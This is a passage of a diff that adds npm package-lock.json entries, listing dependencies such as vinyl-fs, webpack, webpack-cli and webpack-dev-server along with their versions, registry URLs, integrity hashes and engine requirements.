"https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": "sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "node_modules/vinyl-contents/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/vinyl-fs": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/vinyl-fs/-/vinyl-fs-4.0.0.tgz", + "integrity": "sha512-7GbgBnYfaquMk3Qu9g22x000vbYkOex32930rBnc3qByw6HfMEAoELjCjoJv4HuEQxHAurT+nvMHm6MnJllFLw==", + "dev": true, + "dependencies": { + "fs-mkdirp-stream": "^2.0.1", + "glob-stream": "^8.0.0", + "graceful-fs": "^4.2.11", + "iconv-lite": "^0.6.3", + "is-valid-glob": "^1.0.0", + "lead": "^4.0.0", + "normalize-path": "3.0.0", + "resolve-options": "^2.0.0", + "stream-composer": "^1.0.2", + "streamx": "^2.14.0", + "to-through": "^3.0.0", + "value-or-function": "^4.0.0", + "vinyl": "^3.0.0", + "vinyl-sourcemap": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-fs/node_modules/iconv-lite": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", + "dev": true, + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/vinyl-sourcemap": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/vinyl-sourcemap/-/vinyl-sourcemap-2.0.0.tgz", + "integrity": "sha512-BAEvWxbBUXvlNoFQVFVHpybBbjW1r03WhohJzJDSfgrrK5xVYIDTan6xN14DlyImShgDRv2gl9qhM6irVMsV0Q==", + "dev": true, + "dependencies": { + "convert-source-map": "^2.0.0", + "graceful-fs": "^4.2.10", + "now-and-later": "^3.0.0", + "streamx": "^2.12.5", + "vinyl": "^3.0.0", + "vinyl-contents": "^2.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/vinyl-sourcemap/node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true + }, + "node_modules/void-elements": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/void-elements/-/void-elements-3.1.0.tgz", + "integrity": "sha512-Dhxzh5HZuiHQhbvTW9AMetFfBHDMYpo23Uo9btPXgdYP+3T5S+p+jgNy7spra+veYhBP2dCSgxR/i2Y02h5/6w==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/w3c-hr-time": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/w3c-hr-time/-/w3c-hr-time-1.0.2.tgz", + "integrity": "sha512-z8P5DvDNjKDoFIHK7q8r8lackT6l+jo/Ye3HOle7l9nICP9lf1Ci25fy9vHd0JOWewkIFzXIEig3TdKT7JQ5fQ==", + "dev": true, + "dependencies": { + "browser-process-hrtime": "^1.0.0" + } + }, + "node_modules/w3c-keyname": { + "version": "2.2.8", + "resolved": "https://registry.npmjs.org/w3c-keyname/-/w3c-keyname-2.2.8.tgz", + "integrity": "sha512-dpojBhNsCNN7T82Tm7k26A6G9ML3NkhDsnw9n/eoxSRlVBB4CEtIQ/KTCLI2Fwf3ataSXRhYFkQi3SlnFwPvPQ==", + "dev": true + }, + "node_modules/w3c-xmlserializer": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-3.0.0.tgz", + "integrity": "sha512-3WFqGEgSXIyGhOmAFtlicJNMjEps8b1MG31NCA0/vOF9+nKMUW1ckhi9cnNHmf88Rzw5V+dwIwsm2C7X8k9aQg==", + "dev": true, + "dependencies": { + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/walk-up-path": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/walk-up-path/-/walk-up-path-3.0.1.tgz", + "integrity": "sha512-9YlCL/ynK3CTlrSRrDxZvUauLzAswPCrsaCgilqFevUYpeEW0/3ScEjaa3kbW/T0ghhkEr7mv+fpjqn1Y1YuTA==", + "dev": true, + "license": "ISC" + }, + "node_modules/walkdir": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/walkdir/-/walkdir-0.4.1.tgz", + "integrity": "sha512-3eBwRyEln6E1MSzcxcVpQIhRG8Q1jLvEqRmCZqS3dsfXEDR/AhOF4d+jHg1qvDCpYaVRZjENPQyrVxAkQqxPgQ==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/watchpack": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/watchpack/-/watchpack-2.4.1.tgz", + "integrity": "sha512-8wrBCMtVhqcXP2Sup1ctSkga6uc2Bx0IIvKyT7yTFier5AXHooSI+QyQQAtTb7+E0IUCCKyTFmXqdqgum2XWGg==", + "dev": true, + "dependencies": { + "glob-to-regexp": "^0.4.1", + "graceful-fs": "^4.1.2" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/wbuf": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/wbuf/-/wbuf-1.7.3.tgz", + "integrity": "sha512-O84QOnr0icsbFGLS0O3bI5FswxzRr8/gHwWkDlQFskhSPryQXvrTMxjxGP4+iWYoauLoBvfDpkrOauZ+0iZpDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "minimalistic-assert": "^1.0.0" + } + }, + "node_modules/web-streams-polyfill": { + "version": "4.0.0-beta.1", + "resolved": "https://registry.npmjs.org/web-streams-polyfill/-/web-streams-polyfill-4.0.0-beta.1.tgz", + "integrity": "sha512-3ux37gEX670UUphBF9AMCq8XM6iQ8Ac6A+DSRRjDoRBm1ufCkaCDdNVbaqq60PsEkdNlLKrGtv/YBP4EJXqNtQ==", + "engines": { + "node": ">= 12" + } + }, + "node_modules/webidl-conversions": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-7.0.0.tgz", + "integrity": "sha512-VwddBukDzu71offAQR975unBIGqfKZpM+8ZX6ySk8nYhVoo5CYaZyzt3YBvYtRtO+aoGlqxPg/B87NGVZ/fu6g==", + "engines": { + "node": ">=12" + } + }, + "node_modules/webpack": { + "version": "5.98.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-5.98.0.tgz", + "integrity": "sha512-UFynvx+gM44Gv9qFgj0acCQK2VE1CtdfwFdimkapco3hlPCJ/zeq73n2yVKimVbtm+TnApIugGhLJnkU6gjYXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/eslint-scope": "^3.7.7", + "@types/estree": "^1.0.6", + "@webassemblyjs/ast": "^1.14.1", + "@webassemblyjs/wasm-edit": "^1.14.1", + "@webassemblyjs/wasm-parser": "^1.14.1", + "acorn": "^8.14.0", + "browserslist": "^4.24.0", + "chrome-trace-event": "^1.0.2", + "enhanced-resolve": "^5.17.1", + "es-module-lexer": "^1.2.1", + "eslint-scope": "5.1.1", + "events": "^3.2.0", + "glob-to-regexp": "^0.4.1", + "graceful-fs": "^4.2.11", + "json-parse-even-better-errors": "^2.3.1", + "loader-runner": "^4.2.0", + "mime-types": "^2.1.27", + "neo-async": "^2.6.2", + "schema-utils": "^4.3.0", + "tapable": "^2.1.1", + "terser-webpack-plugin": "^5.3.11", + "watchpack": "^2.4.1", + "webpack-sources": "^3.2.3" + }, + "bin": { + "webpack": "bin/webpack.js" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependenciesMeta": { + "webpack-cli": { + "optional": true + } + } + }, + "node_modules/webpack-assets-manifest": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/webpack-assets-manifest/-/webpack-assets-manifest-5.2.1.tgz", + "integrity": "sha512-MsEcXVio1GY6R+b4dVfTHIDMB0RB90KajQG8neRbH92vE2S1ClGw9mNa9NPlratYBvZOhExmN0qqMNFTaCTuIg==", + "dev": true, + "dependencies": { + "chalk": "^4.1.2", + "deepmerge": "^4.3.1", + "lockfile": "^1.0.4", + "lodash.get": "^4.4.2", + "lodash.has": "^4.5.2", + "schema-utils": "^3.3.0", + "tapable": "^2.2.1" + }, + "engines": { + "node": ">=10.13.0" + }, + "peerDependencies": { + "webpack": "^5.2.0" + } + }, + "node_modules/webpack-assets-manifest/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/webpack-assets-manifest/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/webpack-assets-manifest/node_modules/deepmerge": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/webpack-assets-manifest/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/webpack-cli": { + "version": "5.1.4", + "resolved": "https://registry.npmjs.org/webpack-cli/-/webpack-cli-5.1.4.tgz", + "integrity": "sha512-pIDJHIEI9LR0yxHXQ+Qh95k2EvXpWzZ5l+d+jIo+RdSm9MiHfzazIxwwni/p7+x4eJZuvG1AJwgC4TNQ7NRgsg==", + "dev": true, + "dependencies": { + "@discoveryjs/json-ext": "^0.5.0", + "@webpack-cli/configtest": "^2.1.1", + "@webpack-cli/info": "^2.0.2", + "@webpack-cli/serve": "^2.0.5", + "colorette": "^2.0.14", + "commander": "^10.0.1", + "cross-spawn": "^7.0.3", + "envinfo": "^7.7.3", + "fastest-levenshtein": "^1.0.12", + "import-local": "^3.0.2", + "interpret": "^3.1.1", + "rechoir": "^0.8.0", + "webpack-merge": "^5.7.3" + }, + "bin": { + "webpack-cli": "bin/cli.js" + }, + "engines": { + "node": ">=14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "5.x.x" + }, + "peerDependenciesMeta": { + "@webpack-cli/generators": { + "optional": true + }, + "webpack-bundle-analyzer": { + "optional": true + }, + "webpack-dev-server": { + "optional": true + } + } + }, + "node_modules/webpack-cli/node_modules/commander": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-10.0.1.tgz", + "integrity": "sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==", + "dev": true, + "engines": { + "node": ">=14" + } + }, + "node_modules/webpack-cli/node_modules/interpret": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/interpret/-/interpret-3.1.1.tgz", + "integrity": "sha512-6xwYfHbajpoF0xLW+iwLkhwgvLoZDfjYfoFNu8ftMoXINzwuymNLd9u/KmwtdT2GbR+/Cz66otEGEVVUHX9QLQ==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-dev-middleware": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-7.4.2.tgz", + "integrity": "sha512-xOO8n6eggxnwYpy1NlzUKpvrjfJTvae5/D6WOK0S2LSo7vjmo5gCM1DbLUmFqrMTJP+W/0YZNctm7jasWvLuBA==", + "dev": true, + "license": "MIT", + "dependencies": { + "colorette": "^2.0.10", + "memfs": "^4.6.0", + "mime-types": "^2.1.31", + "on-finished": "^2.4.1", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "node_modules/webpack-dev-middleware/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack-dev-middleware/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack-dev-middleware/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack-dev-middleware/node_modules/memfs": { + "version": "4.17.0", + "resolved": "https://registry.npmjs.org/memfs/-/memfs-4.17.0.tgz", + "integrity": "sha512-4eirfZ7thblFmqFjywlTmuWVSvccHAJbn1r8qQLzmTO11qcqpohOjmY2mFce6x7x7WtskzRqApPD0hv+Oa74jg==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@jsonjoy.com/json-pack": "^1.0.3", + "@jsonjoy.com/util": "^1.3.0", + "tree-dump": "^1.0.1", + "tslib": "^2.0.0" + }, + "engines": { + "node": ">= 4.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + } + }, + "node_modules/webpack-dev-middleware/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/webpack-dev-middleware/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/webpack-dev-server": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/webpack-dev-server/-/webpack-dev-server-5.2.1.tgz", + "integrity": "sha512-ml/0HIj9NLpVKOMq+SuBPLHcmbG+TGIjXRHsYfZwocUBIqEvws8NnS/V9AFQ5FKP+tgn5adwVwRrTEpGL33QFQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/bonjour": "^3.5.13", + "@types/connect-history-api-fallback": "^1.5.4", + "@types/express": "^4.17.21", + "@types/express-serve-static-core": "^4.17.21", + "@types/serve-index": "^1.9.4", + "@types/serve-static": "^1.15.5", + "@types/sockjs": "^0.3.36", + "@types/ws": "^8.5.10", + "ansi-html-community": "^0.0.8", + "bonjour-service": "^1.2.1", + "chokidar": "^3.6.0", + "colorette": "^2.0.10", + "compression": "^1.7.4", + "connect-history-api-fallback": "^2.0.0", + "express": "^4.21.2", + "graceful-fs": "^4.2.6", + "http-proxy-middleware": "^2.0.7", + "ipaddr.js": "^2.1.0", + "launch-editor": "^2.6.1", + "open": "^10.0.3", + "p-retry": "^6.2.0", + "schema-utils": "^4.2.0", + "selfsigned": "^2.4.1", + "serve-index": "^1.9.1", + "sockjs": "^0.3.24", + "spdy": "^4.0.2", + "webpack-dev-middleware": "^7.4.2", + "ws": "^8.18.0" + }, + "bin": { + "webpack-dev-server": "bin/webpack-dev-server.js" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + }, + "webpack-cli": { + "optional": true + } + } + }, + "node_modules/webpack-dev-server/node_modules/@types/express": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.21.tgz", + "integrity": "sha512-ejlPM315qwLpaQlQDTjPdsUFSc6ZsP4AN6AlWnogPjQ7CVi7PYF3YVz+CY3jE2pwYf7E/7HlDAN0rV2GxTG0HQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": "^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "node_modules/webpack-dev-server/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack-dev-server/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack-dev-server/node_modules/define-lazy-prop": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/define-lazy-prop/-/define-lazy-prop-3.0.0.tgz", + "integrity": "sha512-N+MeXYoqr3pOgn8xfyRPREN7gHakLYjhsHhWGT3fWAiL4IkAt0iDw14QiiEm2bE30c5XX5q0FtAA3CK5f9/BUg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/ipaddr.js": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-2.2.0.tgz", + "integrity": "sha512-Ag3wB2o37wslZS19hZqorUnrnzSkpOVy+IiiDEiTqNubEYpYuHWIf6K4psgN2ZWKExS4xhVCrRVfb/wfW8fWJA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10" + } + }, + "node_modules/webpack-dev-server/node_modules/is-wsl": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/is-wsl/-/is-wsl-3.1.0.tgz", + "integrity": "sha512-UcVfVfaK4Sc4m7X3dUSoHoozQGBEFeDC+zVo06t98xe8CzHSZZBekNXH+tu0NalHolcJ/QAGqS46Hef7QXBIMw==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-inside-container": "^1.0.0" + }, + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack-dev-server/node_modules/open": { + "version": "10.1.1", + "resolved": "https://registry.npmjs.org/open/-/open-10.1.1.tgz", + "integrity": "sha512-zy1wx4+P3PfhXSEPJNtZmJXfhkkIaxU1VauWIrDZw1O7uJRDRJtKr9n3Ic4NgbA16KyOxOXO2ng9gYwCdXuSXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "default-browser": "^5.2.1", + "define-lazy-prop": "^3.0.0", + "is-inside-container": "^1.0.0", + "is-wsl": "^3.1.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/webpack-hot-middleware": { + "version": "2.25.3", + "resolved": "https://registry.npmjs.org/webpack-hot-middleware/-/webpack-hot-middleware-2.25.3.tgz", + "integrity": "sha512-IK/0WAHs7MTu1tzLTjio73LjS3Ov+VvBKQmE8WPlJutgG5zT6Urgq/BbAdRrHTRpyzK0dvAvFh1Qg98akxgZpA==", + "dev": true, + "dependencies": { + "ansi-html-community": "0.0.8", + "html-entities": "^2.1.0", + "strip-ansi": "^6.0.0" + } + }, + "node_modules/webpack-manifest-plugin": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/webpack-manifest-plugin/-/webpack-manifest-plugin-5.0.0.tgz", + "integrity": "sha512-8RQfMAdc5Uw3QbCQ/CBV/AXqOR8mt03B6GJmRbhWopE8GzRfEpn+k0ZuWywxW+5QZsffhmFDY1J6ohqJo+eMuw==", + "dev": true, + "dependencies": { + "tapable": "^2.0.0", + "webpack-sources": "^2.2.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "peerDependencies": { + "webpack": "^5.47.0" + } + }, + "node_modules/webpack-manifest-plugin/node_modules/webpack-sources": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/webpack-sources/-/webpack-sources-2.3.1.tgz", + "integrity": "sha512-y9EI9AO42JjEcrTJFOYmVywVZdKVUfOvDUPsJea5GIr1JOEGFVqwlY2K098fFoIjOkDzHn2AjRvM8dsBZu+gCA==", + "dev": true, + "dependencies": { + "source-list-map": "^2.0.1", + "source-map": "^0.6.1" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-merge": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/webpack-merge/-/webpack-merge-5.10.0.tgz", + "integrity": "sha512-+4zXKdx7UnO+1jaN4l2lHVD+mFvnlZQP/6ljaJVb4SZiwIKeUnrT5l0gkT8z+n4hKpC+jpOv6O9R+gLtag7pSA==", + "dev": true, + "dependencies": { + "clone-deep": "^4.0.1", + "flat": "^5.0.2", + "wildcard": "^2.0.0" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/webpack-merge/node_modules/wildcard": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/wildcard/-/wildcard-2.0.0.tgz", + "integrity": "sha512-JcKqAHLPxcdb9KM49dufGXn2x3ssnfjbcaQdLlfZsL9rH9wgDQjUtDxbo8NE0F6SFvydeu1VhZe7hZuHsB2/pw==", + "dev": true + }, + "node_modules/webpack-sources": { + "version": "3.2.3", + "resolved": "https://registry.npmjs.org/webpack-sources/-/webpack-sources-3.2.3.tgz", + "integrity": "sha512-/DyMEOrDgLKKIG0fmvtz+4dUX/3Ghozwgm6iPp8KRhvn+eQf9+Q7GWxVNMk3+uCPWfdXYC4ExGBckIXdFEfH1w==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-virtual-modules": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/webpack-virtual-modules/-/webpack-virtual-modules-0.6.2.tgz", + "integrity": "sha512-66/V2i5hQanC51vBQKPH4aI8NMAcBW59FVBs+rC7eGHupMyfn34q7rZIE+ETlJ+XTevqfUhVVBgSUNSW2flEUQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack/node_modules/acorn": { + "version": "8.14.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.0.tgz", + "integrity": "sha512-cl669nCJTZBsL97OF4kUQm5g5hC2uihk0NxY3WENAC0TYdILVkAyHymAntgxGkl7K+t0cXIrH5siy5S4XkFycA==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/webpack/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack/node_modules/events": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", + "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", + "dev": true, + "engines": { + "node": ">=0.8.x" + } + }, + "node_modules/webpack/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, 